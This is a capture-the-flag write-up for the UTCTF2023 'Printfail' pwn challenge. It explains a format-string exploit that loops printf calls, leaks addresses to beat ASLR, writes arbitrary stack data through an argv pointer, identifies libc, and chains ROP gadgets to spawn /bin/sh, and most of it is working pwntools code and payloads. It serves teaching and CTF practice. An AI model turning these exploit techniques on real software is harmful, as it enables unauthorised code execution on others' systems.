# UTCTF2023 - Printfail

## Challenge Description

I managed to break pwntools with this.

By Jonathan (JBYoshi#5551 on discord)

## Flag

`utflag{one_printf_to_rule_them_all}`

## Summary

In order to get flag one need to trick the program into
allowing them to put multiple payloads into printf and
after defeating the ASLR get the libc that is running
on the target system and perform ROP chain into the libc

## Detailed Solution

### Static analysys

There are two important functions in the binary

```c
int main()
{
  int has_less_than_two_chars; // [rsp+4h] [rbp-Ch] BYREF

  puts("I'll let you make one printf call. You control the format string. No do-overs.");
  has_less_than_two_chars = 1;
  while (has_less_than_two_chars) {
    if (!run_round(&has_less_than_two_chars))
      return 0;
    if ( has_less_than_two_chars )
      puts("...That was an empty string. Come on, you've at least gotta try!\nOkay, I'll give you another chance.");
  }
  return 0;
}

int run_round(int *has_less_than_two_chars)
{
  memset(buf, 0, sizeof(buf));
  fflush(stdout);
  if (!fgets(buf, 512, stdin))
    return 0;
  *has_less_than_two_chars = strlen(buf) <= 1;
  return printf(buf);
}
```

The function `run_round` gets input from user and then
passes it into `printf`, if error occures it returns `0`
otherwise it returns non zero value

It also sets the value of `*has_less_than_two_chars` to `1`
if the string provided by user is empty or only consists
of a single newline character

The `main` function exits on any error in the `run_round`
function, and if user provided an empty string gives him
another chance to pass a string to the program

### Running the program

The program will be run with `pwntools` and gdb atached to
it to simplify debugging

```python
#!/bin/python

from pwn import *

context.terminal = ['alacritty', '-e', 'sh', '-c']

code = ELF("./printfail")
io = gdb.debug('./printfail', gdbscript = '''
        b main
        c
''')

p = log.progress("Exploiting")
io.interactive()
```

### Multiple printf payloads

As stated in the summary it is required to pass multiple
payloads into `printf` in order to pass the challenge

Fortunetely `main` function passes a pointer to `has_less_than_two_chars`
into `run_round` which is then pushed onto the stack

This variable can be accessed by passing `%7$p` into the
program, the number we get is the pointer to `has_less_than_two_chars`

The first printf argument that is on the stack and not
in a register is always 7th on any linux system

Using simple format string payload it can be set to a
non zero value, just make sure to print some characters 
before

```python
p = log.progress("Exploiting")

# %7$n writes number of characters to bool that determines if loop should be run again
io.recvuntil(b'do-overs.')
io.sendline(b'%7$p %7$n')

io.interactive()
```

By doing this `has_less_than_two_chars` is overwritten
and program gives the user another chance of passing
string into `printf`

### Defeating ASLR

In almost every challenge where ASLR is enabled it is
required to leak code and stack pointers from the stack

The payload from earlier can be expanded to print `main`'s
`rbp` and the return pointer from `run_round`, they are
on the stack right after `*has_less_than_two_chars`

```python
io.sendline(b'%8$p %9$p %11$p %15$p %7$p %7$nXXX')
```

After that the string returned from the program can
be parsed

```python
leak = io.recvuntil(b'XXX')
addresses = leak.decode("ASCII").split()

return_address = int(addresses[1], 16)
stack_address = int(addresses[0], 16)
stack_protector = int(addresses[2], 16)
argv_address = int(addresses[3], 16)

RETURN_ADDRESS_OFFSET = code.symbols['main'] + 60
base_code_address = return_address - RETURN_ADDRESS_OFFSET

log.info("Return address: " + hex(return_address))
log.info("Base code address: " + hex(base_code_address))
log.info("Stack address: " + hex(stack_address))
log.info("Argv address: " + hex(argv_address))
log.info("Stack protector: " + hex(stack_protector))
```

In the code above stack protector which will not be
used is leaked too, and `argv_address` whose use will
be explained later

### Restricted format string write

When using format string exploit to write data `%hhn`,
`%hn` and `%n` can be used, it takes an address from
the stack and writes to it number of characters that
have already been printed

However due to the fact that in this challenge the
buffer for user input is placed in the `bss` section
and not on the stack it is impossible to use the standard
approach of putting the addresses on the stack in the
payload

Moreover it is impossible to directly create a 64-bit
address on the stack as the biggest chunk of data
that can be written using one pointer is 32 bits
using `%n`, which is not feasable as setting
memory to `0xffffffff` would require sending 4GiB
of data over the network

In order to write arbitrary data of arbitrary
length onto the stack we need a valid pointer 
to the stack that we could increment at will

### Partialy overwriting pointers on the stack

Fortunetely libc provides `main` function with a
pointer to `argv` which is an array of pointers
to the stack, that is the `argv_address` mentioned 
before

Using gdb we can prove that it points to a
pointer pointing to the stack

```
[*] Argv address: 0x7ffe50c88200

gef>  x/xg 0x7ffe50c88200
0x7ffe50c88200:	0x00007ffe50c88208
```

Due to the fact that there is a pointer on the
stack pointing to this memory it is possible to
change last 16 bits of that address using `%15$hn`

```python
def set_argv_address(address):
    address = address % 0x10000
    ab = str(address).encode('ASCII')

    io.recvuntil(b'chance.')
    io.sendline(b'%' + ab + b'c%15$hn %7$n')

set_argv_address(0x1337)
```

If that memory address is checked again it would
end in 0x1337

This will be used to create valid pointers to the
stack that can be incremented whenever needed

### Getting access to controlled pointer

Due to the fact that the pointer is on the stack,
it can be accessed as `printf` argument

Using some trial and error, the pointer can be
accessed using following code

```python
argv_base_offset = 44 - 32

argv_offset = (argv_address - stack_address) // 8
argv_total_offset = argv_offset + argv_base_offset
aob = str(argv_total_offset).encode('ASCII')

log.info("Argv offset: " + str(argv_offset))
log.info("Argv total offset: " + str(argv_total_offset))

io.recvuntil(b'chance.')
io.sendline(b'%' + aob + b'$p %7$n')
```

If this code is put right after changing the suffix
of address to `0x1337` the changed pointer can be seen
in the output

### Writing arbitrary amount of arbitrary data to the stack

Since now there is a way to create easily incrementable
valid pointer to the stack, it is possible to write arbitrary
data of arbitrary length to the stack

The function to write a byte of data to the address
previously set by `set_argv_address` function

```python
def write_argv_byte(byte):
    io.recvuntil(b'chance.')
    if byte == 0:
        io.sendline(b'%' + aob + b'$hhn %7$n')
    else:
        l = str(byte).encode('ASCII')
        io.sendline(b'%' + l + b'c%' + aob + b'$hhn %7$n')
```

When writing byte array the pointer is set each time
a byte is writen and incremented each time

```python
def write_stack_bytes(addr, arr):
    for b in arr:
        set_argv_address(addr)
        write_argv_byte(b)
        addr += 1
```

Now using that function it is possible to write arbitrary
pointer into the memory at address `stack_address`, as
it points to unused part of memory on the stack, therefor
will not crash the program and will be accessible as `printf`
argument

```python
def write_stack_address(addr):
    write_stack_bytes(stack_address, p64(addr))
```

The fully arbitrary address can then be accessed as 12 th
argument of the `printf`

### Leaking libc addresses

Due to the fact that there is no `syscall` gadget or `system`
funttion in program's code it is needed to get access to 
exact libc binary that the remote server is using

In order to do so GOT ( Global Offset Table ) can be used to
acquire the addresses of commonly used libc functions, as it
stores addresses of loaded functions from dynamicaly loaded
libraries

It can be done using following code

```python
def read_address(addr):
    write_stack_address(addr)

    io.recvuntil(b'chance.\n')
    io.sendline(b'%12$sX %7$n')

    leak = io.recvuntil(b'X')[:-1]
    leak += b'\x00' * (8 - len(leak))

    return u64(leak)

def read_got(symbol):
    return read_address(base_code_address + code.got[symbol])

p.status("Leaking libc addresses")

log.info("Puts address: " + hex(read_got('puts')))
log.info("Printf address: " + hex(read_got('printf')))
log.info("Fgets address: " + hex(read_got('fgets')))
```

As now the code accesses memory by pointer and not
directly prints values from the stack it is required
to use `%s` instead of `%p` in order to print a string
at specified address, unfortunetely it will stop
printing when there is a null byte in address, so it
is required to pad the leaked bytes with null bytes

It is worth noting that if there are null bytes
somewhere in the middle of the address, the program
would get incomplete results, it can be fixed, but
in this case whole addresses

Possible result is:

```
[*] Puts address: 0x7f9e49469420
[*] Printf address: 0x7f9e49446c90
[*] Fgets address: 0x7f9e49467630
```

Now these addresses can be put into 
[https://libc.rip/](https://libc.rip/)
in order to get the exact libc binary that is running
on the remote server

Getting base libc address for future use:

```python
libc = ELF('.../libc.so')
libc_base = read_got('puts') - libc.symbols['puts']
```

### ROP chain into shell

In order to get shell we can set `rax` to `59`,
`rdi` to address to "/bin/sh" and zero both `rsi`
and `rdx`

`rdx` is already zeroed by the main function
when checking the stack protector right before
return, so it does not neeed to be changed

Using ropper following gadgets can be found:

```
printfail + 0x01373:    pop rdi; ret
printfail + 0x01371:    pop rsi; pop r15; ret
printfail + 0x0136b:    pop rbp; pop r12; pop r13; pop r14; pop r15; ret
libc + 0x36174:         pop rax; ret
libc + 0x630a9:         syscall; ret
```

We can overwrite `main` return pointer with 
`printfail + 0x0136b` as right after that there
is the `argv_address` that is used in order to
make arbitrary stack writes so we cannot overwrite
that, when writing this part of the exploit I have
had a lot of trouble accidently overwriting it 😉

```python
POP_RDI_OFFSET =    0x0000000000001373
POP_RSI_OFFSET =    0x0000000000001371
POP_OFFSET =        0x000000000000136b

pop_rdi = base_code_address + POP_RDI_OFFSET
pop_rsi = base_code_address + POP_RSI_OFFSET
pop = base_code_address + POP_OFFSET

write_stack_bytes(stack_address + 8, p64(pop))
```

Then after some arbitrary data the rest of the
ROP chain can be put:

```python
rop_payload = (
            p64(pop_rdi) +
            p64(buf) + # Input buffer address
            p64(pop_rsi) +
            p64(0x00) +
            p64(0xdeadbeef) +
            p64(libc_base + 0x36174) +
            p64(59) +
            p64(libc_base + 0x630a9)
        )

log.info("Payload: " + str(rop_payload))

write_stack_bytes(stack_address + 56, rop_payload)
```

The buffer address can be calculated using:

```python
BUF_OFFSET =        16448
buf = base_code_address + BUF_OFFSET
```

### Getting shell

Now in order to get a shell it is only needed
to send zero terminated path to the binary that
we want to be run, the string will be placed at
the address the ROP chain puts into the `rdi`
register

```python
io.recvuntil(b"chance.\n")
io.sendline(b'/bin/sh\x00')

io.interactive()
```

The null byte is needed in order to make the system
stop parsing filename and  not include the newline
that is present after the payload

Note that now it is required for the main function to
return into the ROP chain so there is no `%7$n` at the
end of the payload

### Fetching flag

The only thing left to do is to change local debugger
to remote process, and retrieve ethe flag

In the interactive shell the flag can be found in the
working directory in a file named `flag.txt`
